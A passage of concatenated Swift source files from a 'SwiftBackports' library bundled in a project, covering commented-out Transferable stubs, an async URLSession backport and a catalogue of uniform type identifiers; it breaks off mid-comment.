//extension BackportTransferRepresentation { // /// Provides a filename to use if the receiver chooses to write the item to disk. // /// // /// Any transfer representation can be written to disk. // /// // /// extension ImageDocumentLayer: BackportTransferable { // /// static var transferRepresentation: some BackportTransferRepresentation { // /// Backport.DataRepresentation(contentType: .layer) { layer in // /// layer.data() // /// } importing: { data in // /// try ImageDocumentLayer(data: data) // /// } // /// .suggestedFileName("Layer.exampleLayer") // /// Backport.DataRepresentation(exportedContentType: .png) { layer in // /// layer.pngData() // /// } // /// .suggestedFileName("Layer.png") // /// } // /// } // /// // /// The .exampleLayer filename extension above should match // /// the extension for the `layer` content type, // /// which you declare in your app's `Info.plist` file. // /// // /// - Parameters: // /// - fileName: The suggested filename including the filename extension. // public func suggestedFileName(_ fileName: String) -> some BackportTransferRepresentation { // fatalError() // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Transferables/AttributedString+Transferable.swift ================================================ //import Foundation // //@available(iOS, introduced: 15, deprecated: 16) //@available(tvOS, introduced: 15, deprecated: 16) //@available(macOS, introduced: 12, deprecated: 13) //@available(watchOS, introduced: 8, deprecated: 9) //extension AttributedString: BackportTransferable { // /// The type of the representation used to import and export the item. // /// // /// Swift infers this type from the return value of the // /// ``transferRepresentation`` property. // public typealias Representation = some BackportTransferRepresentation // // /// The representation used to import and export the item. // /// // /// A ``transferRepresentation`` can contain multiple representations // /// for different content types. // public static var transferRepresentation: Representation { // fatalError() // } //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Transferables/Data+Transferable.swift ================================================ //import Foundation // //@available(iOS, deprecated: 16) //@available(tvOS, deprecated: 16) //@available(macOS, deprecated: 13) //@available(watchOS, deprecated: 9) //extension Data: BackportTransferable, @unchecked Sendable { // // /// The representation used to import and export the item. // /// // /// A ``transferRepresentation`` can contain multiple representations // /// for different content types. // public static var transferRepresentation: some BackportTransferRepresentation { // fatalError() // } // // /// The type of the representation used to import and export the item. // /// // /// Swift infers this type from the return value of the // /// ``transferRepresentation`` property. // public typealias Representation = some BackportTransferRepresentation //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Transferables/Never+Transferable.swift ================================================ import Foundation @available(iOS, deprecated: 16) @available(tvOS, deprecated: 16) @available(macOS, deprecated: 13) @available(watchOS, deprecated: 9) extension Never: BackportTransferable { /// The representation used to import and export the item. /// /// A ``transferRepresentation`` can contain multiple representations /// for different content types. public static var transferRepresentation: Never { fatalError() } } ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Transferables/String+Transferable.swift ================================================ //import Foundation // //@available(iOS, deprecated: 16) //@available(tvOS, deprecated: 16) //@available(macOS, deprecated: 13) //@available(watchOS, deprecated: 9) //extension String: BackportTransferable { // // /// The representation used to import and export the item. // /// // /// A ``transferRepresentation`` can contain multiple representations // /// for different content types. // public static var transferRepresentation: some BackportTransferRepresentation { // fatalError() // } // // /// The type of the representation used to import and export the item. // /// // /// Swift infers this type from the return value of the // /// ``transferRepresentation`` property. // public typealias Representation = some BackportTransferRepresentation //} ================================================ FILE: usprebooter/External/SwiftBackports/CoreTransferable/Transferables/URL+Transferable.swift ================================================ //import Foundation // //extension URL: BackportTransferable, @unchecked Sendable { // // /// The representation used to import and export the item. // /// // /// A ``transferRepresentation`` can contain multiple representations // /// for different content types. // public static var transferRepresentation: some TransferRepresentation { // fatalError() // } // // /// The type of the representation used to import and export the item. // /// // /// Swift infers this type from the return value of the // /// ``transferRepresentation`` property. // public typealias Representation = some TransferRepresentation //} ================================================ FILE: usprebooter/External/SwiftBackports/URLSession/URLSession+Async.swift ================================================ import Foundation @available(macOS, deprecated: 12.0) @available(iOS, introduced: 13, deprecated: 15.0) @available(tvOS, introduced: 13, deprecated: 15.0) @available(watchOS, introduced: 6, deprecated: 8.0) public extension Backport where Wrapped: URLSession { /// Start a data task with a URL using async/await. /// - parameter url: The URL to send a request to. /// - returns: A tuple containing the binary `Data` that was downloaded, /// as well as a `URLResponse` representing the server's response. /// - throws: Any error encountered while performing the data task. func data(from url: URL) async throws -> (Data, URLResponse) { try await data(for: URLRequest(url: url)) } /// Start a data task with a `URLRequest` using async/await. /// - parameter request: The `URLRequest` that the data task should perform. /// - returns: A tuple containing the binary `Data` that was downloaded, /// as well as a `URLResponse` representing the server's response. /// - throws: Any error encountered while performing the data task. func data(for request: URLRequest) async throws -> (Data, URLResponse) { let sessionTask = URLSessionTaskActor() return try await withTaskCancellationHandler { try await withCheckedThrowingContinuation { continuation in Task { await sessionTask.start(wrapped.dataTask(with: request) { data, response, error in guard let data = data, let response = response else { let error = error ?? URLError(.badServerResponse) continuation.resume(throwing: error) return } continuation.resume(returning: (data, response)) }) } } } onCancel: { Task { await sessionTask.cancel() } } } func upload(for request: URLRequest, fromFile fileURL: URL) async throws -> (Data, URLResponse) { let sessionTask = URLSessionTaskActor() return try await withTaskCancellationHandler { try await withCheckedThrowingContinuation { continuation in Task { await sessionTask.start(wrapped.uploadTask(with: request, fromFile: fileURL) { data, response, error in guard let data = data, let response = response else { let error = error ?? URLError(.badServerResponse) return continuation.resume(throwing: error) } continuation.resume(returning: (data, response)) }) } } } onCancel: { Task { await sessionTask.cancel() } } } func upload(for request: URLRequest, from bodyData: Data) async throws -> (Data, URLResponse) { let sessionTask = URLSessionTaskActor() return try await withTaskCancellationHandler { try await withCheckedThrowingContinuation { continuation in Task { await sessionTask.start(wrapped.uploadTask(with: request, from: bodyData) { data, response, error in guard let data = data, let response = response else { let error = error ?? URLError(.badServerResponse) return continuation.resume(throwing: error) } continuation.resume(returning: (data, response)) }) } } } onCancel: { Task { await sessionTask.cancel() } } } func download(for request: URLRequest) async throws -> (URL, URLResponse) { let sessionTask = URLSessionTaskActor() return try await withTaskCancellationHandler { try await withCheckedThrowingContinuation { continuation in Task { await sessionTask.start(wrapped.downloadTask(with: request) { data, response, error in guard let data = data, let response = response else { let error = error ?? URLError(.badServerResponse) return continuation.resume(throwing: error) } continuation.resume(returning: (data, response)) }) } } } onCancel: { Task { await sessionTask.cancel() } } } func download(from url: URL) async throws -> (URL, URLResponse) { let sessionTask = URLSessionTaskActor() return try await withTaskCancellationHandler { try await withCheckedThrowingContinuation { continuation in Task { await sessionTask.start(wrapped.downloadTask(with: url) { data, response, error in guard let data = data, let response = response else { let error = error ?? URLError(.badServerResponse) return continuation.resume(throwing: error) } continuation.resume(returning: (data, response)) }) } } } onCancel: { Task { await sessionTask.cancel() } } } func download(resumeFrom resumeData: Data) async throws -> (URL, URLResponse) { let sessionTask = URLSessionTaskActor() return try await withTaskCancellationHandler { try await withCheckedThrowingContinuation { continuation in Task { await sessionTask.start(wrapped.downloadTask(withResumeData: resumeData) { data, response, error in guard let data = data, let response = response else { let error = error ?? URLError(.badServerResponse) return continuation.resume(throwing: error) } continuation.resume(returning: (data, response)) }) } } } onCancel: { Task { await sessionTask.cancel() } } } } @available(iOS 13, tvOS 13, watchOS 6, *) private actor URLSessionTaskActor { weak var task: URLSessionTask? func start(_ task: URLSessionTask) { self.task = task task.resume() } func cancel() { task?.cancel() } } ================================================ FILE: usprebooter/External/SwiftBackports/UniformTypeIdentifiers/CoreTypes.swift ================================================ import Foundation import CoreServices public extension Backport.UTType { /** A generic base type for most things (files, directories.) **UTI:** public.item */ static var item: Self { .init(kUTTypeItem as String)! } /** A base type for anything containing user-viewable document content (documents, pasteboard data, and document packages.) Types describing files or packages must also conform to `UTType.data` or `UTType.package` in order for the system to bind documents to them. **UTI:** public.content */ static var content: Self { .init(kUTTypeContent as String)! } /** A base type for content formats supporting mixed embedded content (i.e., compound documents). **UTI:** public.composite-content **conforms to:** public.content */ static var compositeContent: Self { .init(kUTTypeCompositeContent as String)! } /** A data item mountable as a volume **UTI:** public.disk-image */ static var diskImage: Self { .init(kUTTypeDiskImage as String)! } /** A base type for any sort of simple byte stream, including files and in-memory data. **UTI:** public.data **conforms to:** public.item */ static var data: Self { .init(kUTTypeData as String)! } /** A file system directory (includes packages _and_ folders.) **UTI:** public.directory **conforms to:** public.item */ static var directory: Self { .init(kUTTypeDirectory as String)! } /** Symbolic link and alias file types conform to this type. **UTI:** com.apple.resolvable */ static var resolvable: Self { .init(kUTTypeResolvable as String)! } /** A symbolic link. **UTI:** public.symlink **conforms to:** public.item, com.apple.resolvable */ static var symbolicLink: Self { .init(kUTTypeSymLink as String)! } /** An executable item. **UTI:** public.executable **conforms to:** public.item */ static var executable: Self { .init(kUTTypeExecutable as String)! } /** A volume mount point (resolvable, resolves to the root directory of a volume.) **UTI:** com.apple.mount-point **conforms to:** public.item, com.apple.resolvable */ static var mountPoint: Self { .init(kUTTypeMountPoint as String)! } /** A fully-formed alias file. **UTI:** com.apple.alias-file **conforms to:** public.data, com.apple.resolvable */ static var aliasFile: Self { .init(kUTTypeAliasFile as String)! } /** A URL bookmark. **UTI:** com.apple.bookmark **conforms to:** public.data, com.apple.resolvable */ static var urlBookmarkData: Self { .init(kUTTypeURLBookmarkData as String)! } /** Any URL. **UTI:** public.url **conforms to:** public.data */ static var url: Self { .init(kUTTypeURL as String)! } /** A URL with the scheme `"file:"`. **UTI:** public.file-url **conforms to:** public.url */ static var fileURL: Self { .init(kUTTypeFileURL as String)! } /** The base type for all text-encoded data, including text with markup (HTML, RTF, etc.). **UTI:** public.text **conforms to:** public.data, public.content */ static var text: Self { .init(kUTTypeText as String)! } /** Text with no markup and an unspecified encoding. **UTI:** public.plain-text **conforms to:** public.text */ static var plainText: Self { .init(kUTTypePlainText as String)! } /** Plain text encoded as UTF-8. **UTI:** public.utf8-plain-text **conforms to:** public.plain-text */ static var utf8PlainText: Self { .init(kUTTypeUTF8PlainText as String)! } /** Plain text encoded as UTF-16 with a BOM, or if a BOM is not present, using "external representation" byte order (big-endian). **UTI:** public.utf16-external-plain-text **conforms to:** public.plain-text */ static var utf16ExternalPlainText: Self { .init(kUTTypeUTF16ExternalPlainText as String)! } /** Plain text encoded as UTF-16, in native byte order, with an optional BOM. **UTI:** public.utf16-plain-text **conforms to:** public.plain-text */ static var utf16PlainText: Self { .init(kUTTypeUTF16PlainText as String)! } /** Text containing delimited values. **UTI:** public.delimited-values-text **conforms to:** public.text */ static var delimitedText: Self { .init(kUTTypeDelimitedText as String)! } /** Text containing comma-separated values (.csv). **UTI:** public.comma-separated-values-text **conforms to:** public.delimited-values-text */ static var commaSeparatedText: Self { .init(kUTTypeCommaSeparatedText as String)! } /** Text containing tab-separated values. **UTI:** public.tab-separated-values-text **conforms to:** public.delimited-values-text */ static var tabSeparatedText: Self { .init(kUTTypeTabSeparatedText as String)! } /** UTF-8 encoded text containing tab-separated values. **UTI:** public.utf8-tab-separated-values-text **conforms to:** public.tab-separated-values-text, public.utf8-plain-text */ static var utf8TabSeparatedText: Self { .init(kUTTypeUTF8TabSeparatedText as String)! } /** Rich Text Format data. **UTI:** public.rtf **conforms to:** public.text */ static var rtf: Self { .init(kUTTypeRTF as String)! } /** Any version of HTML. **UTI:** public.html **conforms to:** public.text */ static var html: Self { .init(kUTTypeHTML as String)! } /** Generic XML. **UTI:** public.xml **conforms to:** public.text */ static var xml: Self { .init(kUTTypeXML as String)! } /** Yet Another Markup Language. **UTI:** public.yaml **conforms to:** public.text */ static var yaml: Self { .init(tag: "application/x-yaml", tagClass: .mimeType, conformingTo: nil)! } /** Abstract type for source code of any language. **UTI:** public.source-code **conforms to:** public.plain-text */ static var sourceCode: Self { .init(kUTTypeSourceCode as String)! } /** Assembly language source (.s) **UTI:** public.assembly-source **conforms to:** public.source-code */ static var assemblyLanguageSource: Self { .init(kUTTypeAssemblyLanguageSource as String)! } /** C source code (.c) **UTI:** public.c-source **conforms to:** public.source-code */ static var cSource: Self { .init(kUTTypeCSource as String)! } /** Objective-C source code (.m) **UTI:** public.objective-c-source **conforms to:** public.source-code */ static var objectiveCSource: Self { .init(kUTTypeObjectiveCSource as String)! } /** Swift source code (.swift) **UTI:** public.swift-source **conforms to:** public.source-code */ static var swiftSource: Self { .init(kUTTypeSwiftSource as String)! } /** C++ source code (.cp, etc.) **UTI:** public.c-plus-plus-source **conforms to:** public.source-code */ static var cPlusPlusSource: Self { .init(kUTTypeCPlusPlusSource as String)! } /** Objective-C++ source code. **UTI:** public.objective-c-plus-plus-source **conforms to:** public.source-code */ static var objectiveCPlusPlusSource: Self { .init(kUTTypeObjectiveCPlusPlusSource as String)! } /** A C header. **UTI:** public.c-header **conforms to:** public.source-code */ static var cHeader: Self { .init(kUTTypeCHeader as String)! } /** A C++ header. **UTI:** public.c-plus-plus-header **conforms to:** public.source-code */ static var cPlusPlusHeader: Self { .init(kUTTypeCPlusPlusHeader as String)! } /** A base type for any scripting language source. **UTI:** public.script **conforms to:** public.source-code */ static var script: Self { .init(kUTTypeScript as String)! } /** An AppleScript text-based script (.applescript). **UTI:** com.apple.applescript.text **conforms to:** public.script */ static var appleScript: Self { .init(kUTTypeAppleScript as String)! } /** An Open Scripting Architecture binary script (.scpt). **UTI:** com.apple.applescript.script **conforms to:** public.data, public.script */ static var osaScript: Self { .init(kUTTypeOSAScript as String)! } /** An Open Scripting Architecture script bundle (.scptd). **UTI:** com.apple.applescript.script-bundle **conforms to:** com.apple.bundle, com.apple.package, public.script */ static var osaScriptBundle: Self { .init(kUTTypeOSAScriptBundle as String)! } /** JavaScript source code **UTI:** com.netscape.javascript-source **conforms to:** public.source-code, public.executable */ static var javaScript: Self { .init(kUTTypeJavaScript as String)! } /** The base type for shell scripts. **UTI:** public.shell-script **conforms to:** public.script */ static var shellScript: Self { .init(kUTTypeShellScript as String)! } /** A Perl script. **UTI:** public.perl-script **conforms to:** public.shell-script */ static var perlScript: Self { .init(kUTTypePerlScript as String)! } /** A Python script. **UTI:** public.python-script **conforms to:** public.shell-script */ static var pythonScript: Self { .init(kUTTypePythonScript as String)! } /** A Ruby script. **UTI:** public.ruby-script **conforms to:** public.shell-script */ static var rubyScript: Self { .init(kUTTypeRubyScript as String)! } /** A PHP script. **UTI:** public.php-script **conforms to:** public.shell-script */ static var phpScript: Self { .init(kUTTypePHPScript as String)! } /** A makefile. **UTI:** public.make-source **conforms to:** public.script */ @available(macOS 12.0, iOS 15.0, watchOS 8.0, tvOS 15.0, *) static var makefile: Self { .init(tag: "make", tagClass: .filenameExtension, conformingTo: nil)! } /** JavaScript object notation (JSON) data **UTI:** public.json **conforms to:** public.text - Note: JSON almost (but doesn't quite) conforms to com.netscape.javascript-source. */ static var json: Self { .init(kUTTypeJSON as String)! } /** A base type for property lists. **UTI:** com.apple.property-list **conforms to:** public.data */ static var propertyList: Self { .init(kUTTypePropertyList as String)! } /** An XML property list. **UTI:** com.apple.xml-property-list **conforms to:** public.xml, com.apple.property-list */ static var xmlPropertyList: Self { .init(kUTTypeXMLPropertyList as String)! } /** A binary property list. **UTI:** com.apple.binary-property-list **conforms to:** com.apple.property-list */ static var binaryPropertyList: Self { .init(kUTTypeBinaryPropertyList as String)! } /** An Adobe PDF document. **UTI:** com.adobe.pdf **conforms to:** public.data, public.composite-content */ static var pdf: Self { .init(kUTTypePDF as String)! } /** A Rich Text Format Directory document (RTF with content embedding in its on-disk format.) **UTI:** com.apple.rtfd **conforms to:** com.apple.package, public.composite-content */ static var rtfd: Self { .init(kUTTypeRTFD as String)! } /** A flattened RTFD document (formatted for the pasteboard.) **UTI:** com.apple.flat-rtfd **conforms to:** public.data, public.composite-content */ static var flatRTFD: Self { .init(kUTTypeFlatRTFD as String)! } /** The WebKit webarchive format. **UTI:** com.apple.webarchive **conforms to:** public.data, public.composite-content */ static var webArchive: Self { .init(kUTTypeWebArchive as String)! } /** A base type for abstract image data. **UTI:** public.image **conforms to:** public.data, public.content */ static var image: Self { .init(kUTTypeImage as String)! } /** A JPEG image. **UTI:** public.jpeg **conforms to:** public.image */ static var jpeg: Self { .init(kUTTypeJPEG as String)! } /** A TIFF image. **UTI:** public.tiff **conforms to:** public.image */ static var tiff: Self { .init(kUTTypeTIFF as String)! } /** A GIF image. **UTI:** com.compuserve.gif **conforms to:** public.image */ static var gif: Self { .init(kUTTypeGIF as String)! } /** A PNG image. **UTI:** public.png **conforms to:** public.image */ static var png: Self { .init(kUTTypePNG as String)! } /** Apple icon data **UTI:** com.apple.icns **conforms to:** public.image */ static var icns: Self { .init(kUTTypeAppleICNS as String)! } /** A Windows bitmap. **UTI:** com.microsoft.bmp **conforms to:** public.image */ static var bmp: Self { .init(kUTTypeBMP as String)! } /** Windows icon data **UTI:** com.microsoft.ico **conforms to:** public.image */ static var ico: Self { .init(kUTTypeICO as String)! } /** A base type for raw image data (.raw). **UTI:** public.camera-raw-image **conforms to:** public.image */ static var rawImage: Self { .init(kUTTypeRawImage as String)! } /** A Scalable Vector Graphics image. **UTI:** public.svg-image **conforms to:** public.image */ static var svg: Self { .init(kUTTypeScalableVectorGraphics as String)! } /** A Live Photo. **UTI:** com.apple.live-photo */ static var livePhoto: Self { .init(kUTTypeLivePhoto as String)! } /** A High Efficiency Image File Format image. **UTI:** public.heif **conforms to:** public.heif-standard */ static var heif: Self { .init(tag: "image/heif", tagClass: .mimeType, conformingTo: nil)! } /** A High Efficiency Image Coding image. **UTI:** public.heic **conforms to:** public.heif-standard */ static var heic: Self { .init(tag: "image/heic", tagClass: .mimeType, conformingTo: nil)! } /** The WebP image format. **UTI:** org.webmproject.webp **conforms to:** public.image */ static var webP: Self { .init(tag: "image/webp", tagClass: .mimeType, conformingTo: nil)! } /** A base type for 3D content. **UTI:** public.3d-content **conforms to:** public.content */ static var threeDContent: Self { .init(kUTType3DContent as String)! } /** Universal Scene Description content. **UTI:** com.pixar.universal-scene-description **conforms to:** public.3d-content, public.data */ static var usd: Self { .init(tag: "usd", tagClass: .filenameExtension, conformingTo: nil)! } /** Universal Scene Description Package content. **UTI:** com.pixar.universal-scene-description-mobile **conforms to:** public.3d-content, public.data */ static var usdz: Self { .init(tag: "usdz", tagClass: .filenameExtension, conformingTo: nil)! } /** A Reality File. **UTI:** com.apple.reality **conforms to:** public.data */ static var realityFile: Self { .init(tag: "model/vnd.reality", tagClass: .mimeType, conformingTo: nil)! } /** A SceneKit serialized scene. **UTI:** com.apple.scenekit.scene **conforms to:** public.3d-content, public.data */ static var sceneKitScene: Self { .init(tag: "scn", tagClass: .filenameExtension, conformingTo: nil)! } /** An AR reference object. **UTI:** com.apple.arobject **conforms to:** public.data */ static var arReferenceObject: Self { .init(tag: "arobject", tagClass: .filenameExtension, conformingTo: nil)! } /** A media format which may contain both video and audio. This type corresponds to what users would label a "movie". **UTI:** public.movie **conforms to:** public.audiovisual-content */ static var movie: Self { .init(kUTTypeMovie as String)! } /** Pure video data with no audio data. **UTI:** public.video **conforms to:** public.movie */ static var video: Self { .init(kUTTypeVideo as String)! } /** Pure audio data with no video data. **UTI:** public.audio **conforms to:** public.audiovisual-content */ static var audio: Self { .init(kUTTypeAudio as String)! } /** A QuickTime movie. **UTI:** com.apple.quicktime-movie **conforms to:** public.movie */ static var quickTimeMovie: Self { .init(kUTTypeQuickTimeMovie as String)! } /** An MPEG-1 or MPEG-2 movie. **UTI:** public.mpeg **conforms to:** public.movie */ static var mpeg: Self { .init(kUTTypeMPEG as String)! } /** An MPEG-2 video. **UTI:** public.mpeg-2-video **conforms to:** public.video */ static var mpeg2Video: Self { .init(kUTTypeMPEG2Video as String)! } /** The MPEG-2 Transport Stream movie format. **UTI:** public.mpeg-2-transport-stream **conforms to:** public.movie */ static var mpeg2TransportStream: Self { .init(kUTTypeMPEG2TransportStream as String)! } /** MP3 audio. **UTI:** public.mp3 **conforms to:** public.audio */ static var mp3: Self { .init(kUTTypeMP3 as String)! } /** MPEG-4 movie **UTI:** public.mpeg-4 **conforms to:** public.movie */ static var mpeg4Movie: Self { .init(kUTTypeMPEG4 as String)! } /** An MPEG-4 audio layer file. **UTI:** public.mpeg-4-audio **conforms to:** public.mpeg-4, public.audio */ static var mpeg4Audio: Self { .init(kUTTypeMPEG4Audio as String)! } /** The Apple protected MPEG4 format (.m4p, iTunes music store format.) **UTI:** com.apple.protected-mpeg-4-audio **conforms to:** public.audio */ static var appleProtectedMPEG4Audio: Self { .init(kUTTypeAppleProtectedMPEG4Audio as String)! } /** An Apple protected MPEG-4 movie. **UTI:** com.apple.protected-mpeg-4-video **conforms to:** com.apple.m4v-video */ static var appleProtectedMPEG4Video: Self { .init(kUTTypeAppleProtectedMPEG4Video as String)! } /** The AVI movie format. **UTI:** public.avi **conforms to:** public.movie */ static var avi: Self { .init(kUTTypeAVIMovie as String)! } /** The AIFF audio format **UTI:** public.aiff-audio **conforms to:** public.aifc-audio */ static var aiff: Self { .init(kUTTypeAudioInterchangeFileFormat as String)! } /** The Microsoft waveform audio format (.wav). **UTI:** com.microsoft.waveform-audio **conforms to:** public.audio */ static var wav: Self { .init(kUTTypeWaveformAudio as String)! } /** The MIDI audio format. **UTI:** public.midi-audio **conforms to:** public.audio */ static var midi: Self { .init(kUTTypeMIDIAudio as String)! } /** The base type for playlists. **UTI:** public.playlist */ static var playlist: Self { .init(kUTTypePlaylist as String)! } /** An M3U or M3U8 playlist **UTI:** public.m3u-playlist **conforms to:** public.text, public.playlist */ static var m3uPlaylist: Self { .init(kUTTypeM3UPlaylist as String)! } /** A user-browsable directory (i.e. not a package.) **UTI:** public.folder **conforms to:** public.directory */ static var folder: Self { .init(kUTTypeFolder as String)! } /** The root folder of a volume or mount point. **UTI:** public.volume **conforms to:** public.folder */ static var volume: Self { .init(kUTTypeVolume as String)! } /** A packaged directory. Bundles differ from packages in that a bundle has an internal file hierarchy that `CFBundle` can read, while packages are displayed to the user as if they were regular files. A single file system object can be both a package and a bundle. **UTI:** com.apple.package **conforms to:** public.directory */ static var package: Self { .init(kUTTypePackage as String)! } /** A directory conforming to one of the `CFBundle` layouts. Bundles differ from packages in that a bundle has an internal file hierarchy that `CFBundle` can read, while packages are displayed to the user as if they were regular files. A single file system object can be both a package and a bundle. **UTI:** com.apple.bundle **conforms to:** public.directory */ static var bundle: Self { .init(kUTTypeBundle as String)! } /** The base type for bundle-based plugins. **UTI:** com.apple.plugin **conforms to:** com.apple.bundle, com.apple.package */ static var pluginBundle: Self { .init(kUTTypePluginBundle as String)! } /** A Spotlight metadata importer bundle. **UTI:** com.apple.metadata-importer **conforms to:** com.apple.plugin */ static var spotlightImporter: Self { .init(kUTTypeSpotlightImporter as String)! } /** A QuickLook preview generator bundle. **UTI:** com.apple.quicklook-generator **conforms to:** com.apple.plugin */ static var quickLookGenerator: Self { .init(kUTTypeQuickLookGenerator as String)! } /** An XPC service bundle. **UTI:** com.apple.xpc-service **conforms to:** com.apple.bundle, com.apple.package */ static var xpcService: Self { .init(kUTTypeXPCService as String)! } /** A macOS or iOS framework bundle. **UTI:** com.apple.framework **conforms to:** com.apple.bundle */ static var framework: Self { .init(kUTTypeFramework as String)! } /** The base type for macOS and iOS applications. **UTI:** com.apple.application **conforms to:** public.executable */ static var application: Self { .init(kUTTypeApplication as String)! } /** A bundled application. **UTI:** com.apple.application-bundle **conforms to:** com.apple.application, com.apple.bundle, com.apple.package */ static var applicationBundle: Self { .init(kUTTypeApplicationBundle as String)! } /** An application extension (.appex). **UTI:** com.apple.application-and-system-extension **conforms to:** com.apple.xpc-service */ static var applicationExtension: Self { .init(tag: "appex", tagClass: .filenameExtension, conformingTo: nil)! } /** A UNIX executable (flat file.) **UTI:** public.unix-executable **conforms to:** public.data, public.executable */ static var unixExecutable: Self { .init(kUTTypeUnixExecutable as String)! } /** A Windows executable (.exe). **UTI:** com.microsoft.windows-executable **conforms to:** public.data, public.executable */ static var exe: Self { .init(kUTTypeExecutable as String)! } /** A System Preferences pane. **UTI:** com.apple.systempreference.prefpane **conforms to:** com.apple.package, com.apple.bundle */ static var systemPreferencesPane: Self { .init(kUTTypeSystemPreferencesPane as String)! } /** an archive of files and directories **UTI:** public.archive */ static var archive: Self { .init(kUTTypeArchive as String)! } /** A GNU zip archive. **UTI:** org.gnu.gnu-zip-archive **conforms to:** public.data, public.archive */ static var gzip: Self { .init(kUTTypeGNUZipArchive as String)! } /** A bzip2 archive. **UTI:** public.bzip2-archive **conforms to:** public.data, public.archive */ static var bz2: Self { .init(kUTTypeBzip2Archive as String)! } /** A zip archive. **UTI:** public.zip-archive **conforms to:** com.pkware.zip-archive */ static var zip: Self { .init(kUTTypeZipArchive as String)! } /** An Apple Archive. **UTI:** com.apple.archive **conforms to:** public.data, public.archive */ static var appleArchive: Self { .init(tag: "aar", tagClass: .filenameExtension, conformingTo: nil)! } /** A base type for spreadsheet documents. **UTI:** public.spreadsheet **conforms to:** public.content */ static var spreadsheet: Self { .init(kUTTypeSpreadsheet as String)! } /** A base type for presentation documents. **UTI:** public.presentation **conforms to:** public.composite-content */ static var presentation: Self { .init(kUTTypePresentation as String)! } /** A database store. **UTI:** public.database */ static var database: Self { .init(kUTTypeData as String)! } /** A base type for messages (email, IM, etc.) **UTI:** public.message */ static var message: Self { .init(kUTTypeMessage as String)! } /** contact information, e.g. for a person, group, organization **UTI:** public.contact */ static var contact: Self { .init(kUTTypeContact as String)! } /** A vCard file. **UTI:** public.vcard **conforms to:** public.text, public.contact */ static var vCard: Self { .init(kUTTypeVCard as String)! } /** A to-do item. **UTI:** public.to-do-item */ static var toDoItem: Self { .init(kUTTypeToDoItem as String)! } /** A calendar event. **UTI:** public.calendar-event */ static var calendarEvent: Self { .init(kUTTypeCalendarEvent as String)! } /** An e-mail message. **UTI:** public.email-message **conforms to:** public.message */ static var emailMessage: Self { .init(kUTTypeEmailMessage as String)! } /** A base type for Apple Internet location files. **UTI:** com.apple.internet-location **conforms to:** public.data */ static var internetLocation: Self { .init(kUTTypeInternetLocation as String)! } /** Microsoft Internet shortcut files (.url). **UTI:** com.apple.internet-location **conforms to:** public.data */ static var internetShortcut: Self { .init(tag: "url", tagClass: .filenameExtension, conformingTo: nil)! } /** A base type for fonts. **UTI:** public.font */ static var font: Self { .init(kUTTypeFont as String)! } /** A bookmark. **UTI:** public.bookmark - SeeAlso: Self.urlBookmarkData */ static var bookmark: Self { .init(kUTTypeBookmark as String)! } /** PKCS#12 data. **UTI:** com.rsa.pkcs-12 **conforms to:** public.data */ static var pkcs12: Self { .init(kUTTypePKCS12 as String)! } /** An X.509 certificate. **UTI:** public.x509-certificate **conforms to:** public.data */ static var x509Certificate: Self { .init(kUTTypeX509Certificate as String)! } /** The EPUB format. **UTI:** org.idpf.epub-container **conforms to:** public.data, public.composite-content */ static var epub: Self { .init(tag: "application/epub+zip", tagClass: .mimeType, conformingTo: nil)! } /** A base type for console logs. **UTI:** public.log */ static var log: Self { .init(kUTTypeLog as String)! } } ================================================ FILE: usprebooter/External/SwiftBackports/UniformTypeIdentifiers/UTTagClass.swift ================================================ import Foundation import CoreServices extension Backport { /** A type representing tag classes. A tag class is a "kind" of label that describes a type in another type system, such as a filename extension or MIME type. A tag is a specific instance of a tag class: for example, `"txt"` is a tag, and that tag is an instance of the tag class `.filenameExtension` that represents the same type as `UTType.plainText`. Older API that does not use `UTTagClass` typically uses an untyped `String` or `CFString` to refer to a tag class as a string. To get the string representation of a tag class, use its `rawValue` property. */ @available(iOS, introduced: 11, deprecated: 14, message: "Use UniformTypeIdentifiers.UTTagClass instead") @available(macOS, introduced: 10.5, deprecated: 11, message: "Use UniformTypeIdentifiers.UTTagClass instead") @available(watchOS, introduced: 4, deprecated: 7, message: "Use UniformTypeIdentifiers.UTTagClass instead") @available(tvOS, introduced: 11, deprecated: 14, message: "Use UniformTypeIdentifiers.UTTagClass instead") public struct UTTagClass: RawRepresentable, Codable, Hashable, CustomStringConvertible, CustomDebugStringConvertible, Sendable { public var rawValue: String public var description: String { rawValue } public var debugDescription: String { String(describing: self) } public init(rawValue: String) { self.rawValue = rawValue } /** The tag class for filename extensions such as `"txt"`. The leading period character is not part of the filename extension and should not be included in the tag. The raw value of this tag class is `"public.filename-extension"`. */ public static var filenameExtension: Self { .init(rawValue: String(kUTTagClassFilenameExtension)) } /** The tag class for MIME types such as `"text/plain"`. The raw value of this tag class is `"public.mime-type"`. */ public static var mimeType: Self { .init(rawValue: String(kUTTagClassMIMEType)) } } } ================================================ FILE: usprebooter/External/SwiftBackports/UniformTypeIdentifiers/UTType.swift ================================================ import Foundation import CoreServices extension Backport { /** A structure representing a type in a type hierarchy. Types may represent files on disk, abstract data types with no on-disk representation, or even entirely unrelated hierarchical classification systems such as hardware. Older API that does not use `UTType` typically uses an untyped `String` or `CFString` to refer to a type by its identifier. To get the identifier of a type for use with these APIs, use the `identifier` property of this type. */ @available(iOS, introduced: 11, deprecated: 14, message: "Use UniformTypeIdentifiers.UTType instead") @available(macOS, introduced: 10.5, deprecated: 11, message: "Use UniformTypeIdentifiers.UTType instead") @available(watchOS, introduced: 4, deprecated: 7, message: "Use UniformTypeIdentifiers.UTType instead") @available(tvOS, introduced: 11, deprecated: 14, message: "Use UniformTypeIdentifiers.UTType instead") public struct UTType: Codable, Hashable, CustomStringConvertible, CustomDebugStringConvertible, Sendable { /** The receiver's identifier. A type is _identified by_ its Uniform Type Identifier (UTI), a reverse-DNS string such as `"public.jpeg"` or `"com.adobe.pdf"`. The type itself _has_ a UTI, but is not itself the UTI. This terminology is not consistently used across Apple's documentation. Older API that does not use `UTType` typically uses an untyped `String` or `CFString` to refer to a type by its identifier. */ public let identifier: String /** If available, the preferred (first available) tag of class `.filenameExtension`. Many uses of types require the generation of a filename (e.g. when saving a file to disk.) If not `nil`, the value of this property is the best available filename extension for the given type, according to its declaration. The value of this property is equivalent to, but more efficient than: ``` type.tags[.filenameExtension]?.first ``` */ public var preferredFilenameExtension: String? { UTTypeCopyPreferredTagWithClass( identifier as CFString, Backport.UTTagClass.filenameExtension.rawValue as CFString )?.takeRetainedValue() as? String } /** If available, the preferred (first available) tag of 